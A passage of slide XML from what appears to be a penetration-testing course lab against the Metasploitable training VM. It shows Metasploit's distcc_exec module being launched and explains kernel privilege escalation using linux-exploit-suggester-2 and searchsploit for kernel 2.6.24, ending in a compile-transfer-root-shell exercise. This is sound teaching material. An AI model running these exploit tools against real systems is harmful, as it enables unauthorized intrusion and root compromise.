              <a:t>Note the different semantics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"Payload" = "shellcode"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"Reverse" shell = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>connectback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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600" dirty="0"/>
              <a:t>Memory addresses of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> opcodes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> are hardcoded depending on version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>None of them map to our location from earlier lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> be fine though, different buffer lengths crash Crossfire in different ways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6446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4A628-14B1-4397-9F78-0844EEE780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err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> exploit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28B65-2445-40A2-9491-387D9507CC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4394622" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>msf5&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>distcc_exec</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="fr-FR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E39B8-E5D4-4146-8BFF-B64646B39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6" y="1651523"/>
            <a:ext cx="7161088" cy="32252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9862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4A628-14B1-4397-9F78-0844EEE780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err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> exploit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C1FC0-8FE6-4144-A410-827CE235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13" y="893624"/>
            <a:ext cx="5285573" cy="39206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6384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3DA65-54BA-4436-910B-CB1A75EBF9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Research!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B520-EA45-4AD9-9A34-E166B3BB15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Privilege Escalation has some basic categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Misconfigurations of services, applications, and the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploitable weaknesses in the kernel or in applications that run at root/system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We'll try a kernel exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start with researching the version we found from `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -a`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53548-280A-1B4A-81F2-C7489CB2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" y="3572521"/>
            <a:ext cx="8572840" cy="649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827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AD68E-B241-4C67-B34E-DDAA7AB2B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Kernel Exploits?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0D78A6-A5E7-41F4-ACE3-16927140CC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Looks like there are a few...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A4DCF-CDC5-4D39-9258-3F94BBFA5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134"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701742" y="1247902"/>
            <a:ext cx="7740515" cy="3628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292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2E6E6-2056-4134-9AE2-7C3A740C36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Linux Exploit Suggester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7F33B0-FE90-495C-BBC4-BDF7A81117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We also have some automated tool options, such as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Linux Exploit Suggester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/jondonas/linux-exploit-suggester-2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/jondonas/linux-exploit-suggester-2.git</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1050" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" sz="1050" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>Once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>it's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>downloaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>options</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" b="1" dirty="0" err="1"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" b="1" dirty="0"/>
              <a:t> linux-exploit-suggester-2/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1050" b="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0"/>
              <a:t>./linux-exploit-suggester-2.pl -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" err="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  #############################</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>    Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>Suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  #############################</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>Usage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>: ./linux-exploit-suggester-2.pl [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>] [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>] [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>] Help (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>Kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>. 2.6.28)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>] Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> download menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>partial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>. 2.4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" err="1"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r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DD137-664A-934F-A380-C84A96B31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677" y="2571750"/>
            <a:ext cx="3800776" cy="22375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3955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0999A-431F-42A4-8885-60ABED697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Metasploitable Kernel Exploits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D1F721-300E-4B0A-8355-759D4499BB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2819" y="921704"/>
            <a:ext cx="6527401" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>./linux-exploit-suggester-2.pl -k 2.6.24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>We still need to research these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>What they exploit - verify that the target is vunerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>What they are used for - verify that it's priv esc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Ease of exploit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901EB-1993-1241-AF86-94DEA492E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5" y="921704"/>
            <a:ext cx="2065176" cy="395509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40120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0999A-431F-42A4-8885-60ABED697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Metasploitable Kernel Exploits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D1F721-300E-4B0A-8355-759D4499BB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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>included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Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> 2.6.24</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="569595" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p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really</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>lot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options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easy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overwhelmed</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> for '2.6' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>instead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'2.6.24'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Focus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identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> false positives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ones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know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>won't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>work</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Trial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exausting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running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>exploits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dangerous</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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473C1-A2E0-BA4B-8B72-A06DB62F2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901" y="1476689"/>
            <a:ext cx="6498197" cy="13626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0172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6900D-F399-4217-8AC0-5FF16374D4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Metasploitable Kernel Exploit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06AD9-8241-4229-8D6B-7276E66841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Please try to identify a kernel exploit yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Compile it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Transfer it over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get your root shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A walkthrough follows this - spoiler warning!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
